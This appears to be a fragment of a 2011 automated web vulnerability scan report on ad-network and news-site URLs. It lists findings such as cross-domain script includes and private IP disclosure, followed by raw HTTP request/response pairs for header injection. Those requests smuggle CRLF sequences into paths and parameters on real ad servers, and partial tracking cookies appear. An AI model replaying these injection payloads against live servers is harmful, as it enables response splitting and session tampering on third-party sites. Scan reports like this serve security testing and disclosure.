17.3. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10
17.4. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136
17.5. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8
17.6. http://ad.doubleclick.net/adj/N2883.6441.USATODAY.COM/B5327539.11
17.7. http://ad.doubleclick.net/adj/N3175.128132.INTERCLICK/B4640114.15
17.8. http://ad.doubleclick.net/adj/invc.macroaxis/widget
17.9. http://ads.bridgetrack.com/a/f/
17.10. http://ads.pointroll.com/PortalServe/
17.11. http://ads.pointroll.com/PortalServe/
17.12. http://ads.pointroll.com/PortalServe/
17.13. http://ads.pointroll.com/PortalServe/
17.14. http://bidder.mathtag.com/iframe/notify
17.15. http://bidder.mathtag.com/iframe/notify
17.16. http://choices.truste.com/ca
17.17. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js
17.18. http://finance.fox8live.com/inergize.wvue
17.19. http://fls.doubleclick.net/activityi
17.20. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH
17.21. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH
17.22. http://gannett.gcion.com/addyn/3.0/5111.1/778079/0/-1/ADTECH
17.23. http://googleads.g.doubleclick.net/pagead/ads
17.24. http://ib.adnxs.com/ptj
17.25. http://ib.adnxs.com/ptj
17.26. http://login.npr.org/openid/embed
17.27. http://radar.weather.gov/radar.php
17.29. http://widgets.macroaxis.com/widgets/partnerMarketsIntradaySnap.jsp
17.30. http://wvue.web.entriq.net/nw/dpm/loadplayer/
17.31. http://www.facebook.com/plugins/like.php
17.32. http://www.facebook.com/plugins/recommendations.php
17.33. http://www.groupon.com/subscriptions/new
17.34. http://www.groupon.com/subscriptions/new
17.35. http://www.srh.noaa.gov/lmrfc/
18. Cross-domain script include
18.1. http://ad.amgdgt.com/ads/
18.2. http://ad.amgdgt.com/ads/
18.3. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10
18.4. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136
18.5. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8
18.6. http://bidder.mathtag.com/iframe/notify
18.7. http://bidder.mathtag.com/iframe/notify
18.8. http://content.usatoday.com/topics/reporter/Doyle+Rice
18.9. http://d7.zedo.com/bar/v16-406/d3/jsc/fmr.js
18.10. http://finance.fox8live.com/inergize.wvue
18.11. http://googleads.g.doubleclick.net/pagead/ads
18.12. http://ib.adnxs.com/ptj
18.13. http://login.npr.org/openid/embed
18.14. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
18.15. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
18.18. http://shop.npr.org/spoken-word/npr-american-chronicles-the-civil-war/
18.19. http://widget.newsinc.com/_fw/therepublic/toppicks_republic_ent.html
18.20. http://widget.newsinc.com/_fw/therepublic/toppicks_republic_lif.html
18.21. http://widget.newsinc.com/_fw/therepublic/toppicks_republic_spt.html
18.22. http://widget.newsinc.com/_fw/therepublic/toppicks_republic_wld.html
18.23. http://widgets.macroaxis.com/widgets/partnerMarketsIntradaySnap.jsp
18.24. http://www.csmonitor.com/Business
18.25. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down
18.26. http://www.facebook.com/plugins/like.php
18.27. http://www.facebook.com/plugins/recommendations.php
18.28. http://www.fox8live.com/business/default.aspx
18.29. http://www.fox8live.com/business/iframe_financialticker.aspx
18.30. http://www.fox8live.com/business/iframe_indexwatch.aspx
18.31. http://www.fox8live.com/content/aboutus/default.aspx
18.32. http://www.fox8live.com/content/news/lee_zurik_investigation/default.aspx
18.33. http://www.fox8live.com/content/news/seregni/default.aspx
18.34. http://www.fox8live.com/content/news/watercooler/default.aspx
18.35. http://www.fox8live.com/default.aspx
18.36. http://www.fox8live.com/entertainment/horoscopes/default.aspx
18.39. http://www.fox8live.com/rss/default.aspx
18.40. http://www.fox8live.com/wireless/default.aspx
18.41. http://www.groupon.com/learn
18.42. http://www.groupon.com/mobile
18.43. http://www.groupon.com/privacy
18.44. http://www.groupon.com/rounded_bottom.png
18.45. http://www.groupon.com/subscriptions/new
18.46. https://www.groupon.com/login
18.47. https://www.groupon.com/users/new
18.48. http://www.hnedata.net/features/tr_stock_charts
18.49. http://www.natchezdemocrat.com/
18.50. http://www.therepublic.com/home/
18.51. http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
19.1. http://amch.questionmarket.com/
19.2. http://bh.contextweb.com/
19.3. http://cdn.taboolasyndication.com/
19.4. http://chart.financialcontent.com/
19.5. http://image2.pubmatic.com/
19.6. http://matcher-apx.bidder7.mookie1.com/
19.7. http://matcher.bidder7.mookie1.com/
19.8. http://matcher.bidder8.mookie1.com/
19.9. http://metrics.csmonitor.com/
19.10. http://metrics.npr.org/
19.11. http://optimized-by.rubiconproject.com/
19.13. http://secure-us.imrworldwide.com/
19.15. http://tacoda.at.atwola.com/
19.16. http://tracker.bidder7.mookie1.com/
19.17. http://tracker.financialcontent.com/
19.18. http://trc.taboolasyndication.com/
19.19. http://usatoday1.112.2o7.net/
19.20. http://widgets.outbrain.com/
19.21. http://wvue.web.entriq.net/
19.22. http://www.collegesurfing.com/
19.24. http://www.srh.noaa.gov/
19.25. http://www.tinbuadserv.com/
20.1. http://radar.weather.gov/Conus/index.php
20.2. http://radar.weather.gov/radar.php
20.3. http://s.meebocdn.net/cim/script/cim_v92_cim_11_8_0.en.js
20.4. http://shop.npr.org/content/vendors/jquery/rater/jquery.rater-custom.js
20.5. http://www.fox8live.com/business/default.aspx
20.6. http://www.fox8live.com/content/aboutus/default.aspx
20.7. http://www.fox8live.com/content/news/lee_zurik_investigation/default.aspx
20.8. http://www.fox8live.com/content/news/seregni/default.aspx
20.9. http://www.fox8live.com/content/news/watercooler/default.aspx
20.10. http://www.fox8live.com/default.aspx
20.13. http://www.fox8live.com/wireless/default.aspx
20.14. http://www.groupon.com/privacy
20.15. https://www.groupon.com/login
20.16. http://www.macroaxis.com/widgets/url.jsp
20.17. http://www.natchezdemocrat.com/
20.18. http://www.npr.org/templates/javascript/generated/regPage.js
20.19. http://www.srh.noaa.gov/cte.htm
20.20. http://www.srh.noaa.gov/lmrfc/
20.21. http://www.srh.noaa.gov/lmrfc/quickbrief.php
20.22. http://www.srh.noaa.gov/srh.htm
20.23. http://www.therepublic.com/assets/gzip.php
20.24. http://www.therepublic.com/assets/scripts/menu/menu.js
20.25. http://www.therepublic.com/home/
20.26. http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
21. Private IP addresses disclosed
21.1. http://static.ak.fbcdn.net/connect/xd_proxy.php
21.2. http://static.ak.fbcdn.net/rsrc.php/v1/zD/r/B4K_BWwP7P5.png
21.3. http://static.ak.fbcdn.net/rsrc.php/v1/ze/r/nZW4C56WJb6.png
21.4. http://www.facebook.com/extern/login_status.php
21.5. http://www.facebook.com/extern/login_status.php
21.6. http://www.facebook.com/extern/login_status.php
21.7. http://www.facebook.com/plugins/like.php
21.8. http://www.facebook.com/plugins/like.php
21.9. http://www.facebook.com/plugins/like.php
21.10. http://www.facebook.com/plugins/like.php
21.11. http://www.facebook.com/plugins/like.php
21.12. http://www.facebook.com/plugins/like.php
21.13. http://www.facebook.com/plugins/like.php
21.14. http://www.facebook.com/plugins/like.php
21.15. http://www.facebook.com/plugins/like.php
21.16. http://www.facebook.com/plugins/like.php
21.17. http://www.facebook.com/plugins/like.php
21.18. http://www.facebook.com/plugins/like.php
21.19. http://www.facebook.com/plugins/like.php
21.20. http://www.facebook.com/plugins/like.php
21.21. http://www.facebook.com/plugins/like.php
21.22. http://www.facebook.com/plugins/like.php
21.23. http://www.facebook.com/plugins/like.php
21.24. http://www.facebook.com/plugins/like.php
21.25. http://www.facebook.com/plugins/like.php
21.26. http://www.facebook.com/plugins/like.php
21.27. http://www.facebook.com/plugins/like.php
21.28. http://www.facebook.com/plugins/recommendations.php
21.29. http://www.facebook.com/plugins/recommendations.php
21.30. http://www.facebook.com/plugins/recommendations.php
22.1. http://ad.amgdgt.com/ads/
22.2. http://ad.doubleclick.net/pfadx/csmonitor_cim/
22.3. http://ads.pointroll.com/PortalServe/
22.4. http://amch.questionmarket.com/adscgen/sta.php
22.5. http://api.twitter.com/1/wvuefox8/lists/wvue-fox-8-3/statuses.json
22.6. http://assets1.grouponcdn.com/stylesheets/app/subscriptions/subscribe_2s208.css
22.7. http://at.amgdgt.com/ads/
22.8. http://atd.agencytradingdesk.net/WatsonTracker/IMP/A1000138/C1000187/P1003017/pixel.gif
22.9. http://b.scorecardresearch.com/b
22.10. http://b.voicefive.com/b
22.12. http://bidder.mathtag.com/iframe/notify
22.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs
22.14. http://cache-01.cleanprint.net/cp/psj
22.15. http://content.usatoday.com/apps/insidepage/crc.ashx
22.16. http://contextweb.usatoday.net/asp/Context/ContextWebHandler.ashx
22.17. http://d7.zedo.com/bar/v16-406/d3/jsc/fm.js
22.18. http://data.usatoday.net/apps/InsidePage
22.19. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_3_0/StdBannerEx.js
22.20. http://fls.doubleclick.net/activityi
22.21. http://gannett.gcion.com/addyn/3.0/5111.1/809057/0/-1/ADTECH
22.22. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1030881291/
22.23. http://i.usatoday.net/_common/_scripts/_community/lib/usl.photo.js
22.24. http://jqueryui.com/ui/jquery.ui.widget.js
22.25. http://l.addthiscdn.com/live/t00/250lo.gif
22.26. http://login.npr.org/openid/embed
22.27. http://map.media6degrees.com/orbserv/hbpix
22.28. http://metrics.csmonitor.com/b/ss/fcocscsm/1/H.21/s92332599295768
22.29. http://metrics.npr.org/b/ss/nprorg/1/H.17/s91303597942460
22.30. http://mobile.fox8live.com/BlackBerry/default.aspx
22.31. http://pagead2.googlesyndication.com/pagead/imgad
22.32. http://pixel.quantserve.com/pixel
22.33. http://pubads.g.doubleclick.net/gampad/ads
22.34. http://s0.2mdn.net/dot.gif
22.36. http://safebrowsing.clients.google.com/safebrowsing/gethash
22.37. http://segment-pixel.invitemedia.com/pixel
22.38. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll
22.40. http://static.ak.fbcdn.net/connect/xd_proxy.php
22.41. http://stp.fox8live.com/common/pagereporting/nettracker/ntpagetag.gif
22.42. http://t.pointroll.com/PointRoll/Track/
22.43. http://toolbarqueries.clients.google.com/tbproxy/af/query
22.44. http://trc.taboolasyndication.com/usatoday/log/2/available
22.45. http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s97032880377955
22.46. http://va.px.invitemedia.com/adnxs_imp
22.47. http://w10.localadbuy.com/servlet/ajrotator/550/0/vj
22.48. http://widgets.macroaxis.com/widgets/content.jsp
22.49. http://www.collegesurfing.com/searchbox-mge-us.php
22.50. http://www.csmonitor.com/Business
22.51. http://www.facebook.com/plugins/like.php
22.52. http://www.fox8live.com/business/default.aspx
22.53. http://www.google-analytics.com/__utm.gif
22.54. http://www.google.com/finance/chart
22.55. http://www.googleadservices.com/pagead/conversion/1030881291/
22.56. http://www.groupon.com/subscriptions/new
22.57. https://www.groupon.com/login
22.58. http://www.macroaxis.com/widgets/url.jsp
22.59. http://www.meebo.com/cmd/getrotate
22.60. http://www.natchezdemocrat.com/
22.61. http://www.npr.org/templates/reg
22.62. http://www.tinbuadserv.com/v3/serve.php
22.63. http://www.usatoday.com/weather/stormcenter/default.htm
23.1. https://shop.npr.org/favicon.ico
23.2. https://www.groupon.com/login
23.3. https://www.groupon.com/users/new
24. HTML does not specify charset
24.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php
24.2. http://480-adver-view.c3metrics.com/v.js
24.3. http://ad.doubleclick.net/adi/N4300.Google/B5350353.10
24.4. http://ad.doubleclick.net/adi/N4492.134426.1009314592321/B4140786.136
24.5. http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8
24.6. http://ad.doubleclick.net/pfadx/csmonitor_cim/
24.7. http://ads.bridgetrack.com/a/f/
24.8. http://ads.bridgetrack.com/ads_v2/script/btwrite.js
24.9. http://ads.pointroll.com/PortalServe/
24.10. http://amch.questionmarket.com/adscgen/sta.php
24.12. http://bidder.mathtag.com/iframe/notify
24.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs
24.14. http://fls.doubleclick.net/activityi
24.15. http://login.npr.org/openid/embed
24.16. http://odb.outbrain.com/utils/ping.html
24.17. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
24.18. http://share.meebo.com/cim/whitev4.html
24.19. http://uac.advertising.com/wrapper/aceUACping.htm
24.20. http://wvue.web.entriq.net/nw/dpm/loadplayer/
24.21. http://www.fox8live.com/images/phone.png
24.22. http://www.fox8live.com/sites/scripps/images/rounding/tab-bg.gif
24.23. http://www.fox8live.com/sites/wvue/images/promos/fox8insider.jpg
24.24. http://www.therepublic.com/assets/images/ui-bg_flat_75_ffffff_40x100.png
24.25. http://www.therepublic.com/assets/images/ui-bg_glass_65_ffffff_1x400.png
24.26. http://www.therepublic.com/assets/images/ui-bg_glass_75_e6e6e6_1x400.png
24.27. http://www.usatoday.com/_common/_includes/_community/taboola-async.ssi
25. Content type incorrectly stated
25.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php
25.2. http://480-adver-view.c3metrics.com/v.js
25.3. http://a1.interclick.com/getInPageJS.aspx
25.4. http://a1.interclick.com/getInPageJSProcess.aspx
25.5. http://ad.doubleclick.net/pfadx/csmonitor_cim/
25.6. http://adadvisor.net/adscores/g.js
25.7. http://ads.bridgetrack.com/ads_v2/script/btwrite.js
25.8. http://ads.pointroll.com/PortalServe/
25.9. http://amch.questionmarket.com/adscgen/sta.php
25.10. http://ar.voicefive.com/b/rc.pli
25.11. http://bs.serving-sys.com/BurstingPipe/adServer.bs
25.12. http://cdn.rpxnow.com/rel/js/28a35f3454bf56715fe8f8b20c5b1fff.js
25.13. http://contextweb.usatoday.net/asp/Context/ContextWebHandler.ashx
25.14. http://event.adxpose.com/event.flow
25.15. http://i.usatoday.net/_common/_scripts/_community/lib/usl.photo.js
25.16. http://mobile.fox8live.com/ScriptResource.axd
25.17. http://radar.weather.gov/Conus/images/favicon.ico
25.18. http://radar.weather.gov/images/favicon.ico
25.19. http://shop.npr.org/favicon.ico
25.20. http://shop.npr.org/resize.php
25.21. https://shop.npr.org/favicon.ico
25.22. https://shop.npr.org/resize.php
25.23. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app
25.24. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll
25.25. http://trc.taboolasyndication.com/usatoday/trc/2/json
25.26. http://widgets.macroaxis.com/widgets/content.jsp
25.27. http://wvue.web.entriq.net/nw/dpm/loadplayer/
25.28. http://www.collegesurfing.com/js/MGEProgramCategoryDropDown.php
25.29. http://www.macroaxis.com/widgets/url.jsp
25.30. http://www.srh.noaa.gov/images/favicon.ico
25.31. http://www.usatoday.com/community/tags/GetLinkedByline.ashx
26. Content type is not specified
27.2. https://www.groupon.com/
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /ad/N4873.npr.og/B5461009 |
GET /8fdb9%0d%0a31e2c62f70f/N4873.npr.og/B5461009;sz Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ads.pointroll.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/8fdb9 31e2c62f70f/N4873.npr.og/B5461009;sz Date: Mon, 09 May 2011 15:40:16 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N4300.Google |
GET /2d7db%0d%0ac78d659218b/N4300.Google/B5350353.10 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/2d7db c78d659218b/N4300.Google/B5350353.10 Date: Mon, 09 May 2011 15:38:51 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N2883.6441.USATODAY |
GET /12211%0d%0ad920f750be7/N2883.6441.USATODAY.COM Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.usatoday.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/12211 d920f750be7/N2883.6441.USATODAY.COM Date: Mon, 09 May 2011 15:37:09 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/cm.rub_usatoday/ |
GET /523df%0d%0a3531c6c3ac7/cm.rub_usatoday/;net=cm Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/523df 3531c6c3ac7/cm.rub_usatoday/;net=cm Date: Mon, 09 May 2011 15:37:45 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/ipc-csm/globali |
GET /1a24a%0d%0ac7bc2fb3a0/ipc-csm/globalisation_US Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.csmonitor.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/1a24a c7bc2fb3a0/ipc-csm/globalisation_US Date: Mon, 09 May 2011 15:36:21 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/n6735.NPR/utility |
GET /4f36c%0d%0abfaaccb7365/n6735.NPR/utility_search Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.npr.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/4f36c bfaaccb7365/n6735.NPR/utility_search Date: Mon, 09 May 2011 15:40:10 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /dot.gif |
GET /dot.gif86a12%0d%0ad65070f037d?0.18015406071208417 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net d65070f037d: Date: Mon, 09 May 2011 15:35:27 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /pfadx/csmonitor_cim/ |
GET /pfadx/csmonitor_cim/ Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.meebo.com/cim User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html DCLK_imp: v7;x;240052939;0-0;0 02fa660963c=1;~cs=d: Date: Mon, 09 May 2011 15:35:20 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 1240 DoubleClick.onAdLoaded( ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /pfadx/csmonitor_cim/ |
GET /pfadx/csmonitor_cim/ Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.meebo.com/cim User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __gads=ID=3cde97f19b |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: video/x-ms-asf Content-Length: 237 Cache-Control: no-cache Pragma: no-cache Date: Mon, 09 May 2011 15:35:16 GMT Expires: Mon, 09 May 2011 15:35:16 GMT DCLK_imp: v7;x;44306;0-0;0;58826896 04bcc849ea1;~cs=u: <a target="_top" href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://bidder.mathtag.com |
Path: | /iframe/notify |
GET /iframe/notify?exch=a9839%0d%0a37a97c57239&id=5aW95q2jLzEvUTBG Host: bidder.mathtag.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uuid=4dab7d35-b1d2-915a |
HTTP/1.1 404 Not found Date: Mon, 09 May 2011 15:36:40 GMT Server: MMBD/3.5.5 Content-Type: text/html; charset=utf-8 Content-Length: 18 x-mm-debug: exchange not found - a9839 37a97c57239 x-mm-host: ewr-bidder-x6 Connection: keep-alive Request not found |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-406/d3/jsc/fmr |
GET /bar/v16-406/d3/jsc/fmr Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQA |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1099:a641d 5aa97b6dac6;expires=Tue, 10 May 2011 05: 00:00 GMT;domain=.zedo.com;path Set-Cookie: FFcat=1099,2,9;expires Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path Set-Cookie: FFChanCap=1573B496,121 ETag: "ae1b52-8181-4a207a1 Vary: Accept-Encoding X-Varnish: 1332201874 1332193309 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=159 Expires: Mon, 09 May 2011 15:38:49 GMT Date: Mon, 09 May 2011 15:36:10 GMT Connection: close Content-Length: 2035 // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var p9=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat=',a641d 5aa9 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://tacoda.at.atwola |
Path: | /rtx/r.js |
GET /rtx/r.js?cmd=AAU&si Host: tacoda.at.atwola.com Proxy-Connection: keep-alive Referer: http://www.fox8live.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=4DB8055D6E651A4 |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:37:45 GMT Server: Apache/1.3.37 (Unix) mod_perl/1.29 P3P: policyref="http://www P3P: policyref="http://www Cache-Control: max-age=900 Expires: Mon, 09 May 2011 15:52:45 GMT Set-Cookie: ATTACID=a3Z0aWQ9MTZy Set-Cookie: ANRTT=60183^1^1305161950 Set-Cookie: Tsid=0^1304955465 Set-Cookie: TData=99999|^|51134|56281 Set-Cookie: N=2:d324038c0b179251 167f60ab8da,cce56ea51bb938bc8d7 Set-Cookie: ATTAC=a3ZzZWc9OTk5OT Cteonnt-Length: 312 Content-Type: application/x-javascript Content-Length: 312 var ANUT=1; var ANOO=0; var ANSR=1; var ANTID='16r4opq1tvlkml'; var ANSL='99999|^|51134|56281 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://tacoda.at.atwola |
Path: | /rtx/r.js |
GET /rtx/r.js?cmd=AAU&si=88780%0d%0aeb91e55787&pi=L&xs=3&pu=http%253A/ Host: tacoda.at.atwola.com Proxy-Connection: keep-alive Referer: http://www.fox8live.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JEB2=4DB8055D6E651A4 |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:37:44 GMT Server: Apache/1.3.37 (Unix) mod_perl/1.29 P3P: policyref="http://www P3P: policyref="http://www Cache-Control: max-age=900 Expires: Mon, 09 May 2011 15:52:44 GMT Set-Cookie: ATTACID=a3Z0aWQ9MTZy Set-Cookie: ANRTT=60183^1^1305161950 Set-Cookie: Tsid=0^1304955464 eb91e55787^1304955464^1304957264; path=/; expires=Mon, 09-May-11 16:07:44 GMT; domain=tacoda.at.atwola Set-Cookie: TData=99999|^|51134|56281 Set-Cookie: N=2:d324038c0b179251 Set-Cookie: ATTAC=a3ZzZWc9OTk5OT Cteonnt-Length: 312 Content-Type: application/x-javascript Content-Length: 312 var ANUT=1; var ANOO=0; var ANSR=1; var ANTID='16r4opq1tvlkml'; var ANSL='99999|^|51134|56281 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://tracker.bidder7 |
Path: | /tr-goog |
GET /tr-goog?a=4a155dda-808a Host: tracker.bidder7.mookie1 Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: OAX=rcHW802rT5oABV/F; RMFL=011QD4ETU107OI |
HTTP/1.1 302 Found Date: Mon, 09 May 2011 15:39:06 GMT Server: Apache/2.2.3 (Red Hat) Location: http://matcher.bidder7 801dc7ecf54 Cache-Control: no-cache Cache-Control: no-store Pragma: no-cache Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8 |
Severity: | High |
Confidence: | Certain |
Host: | http://480-adver-view |
Path: | /c3VTabstrct-6-2.php |
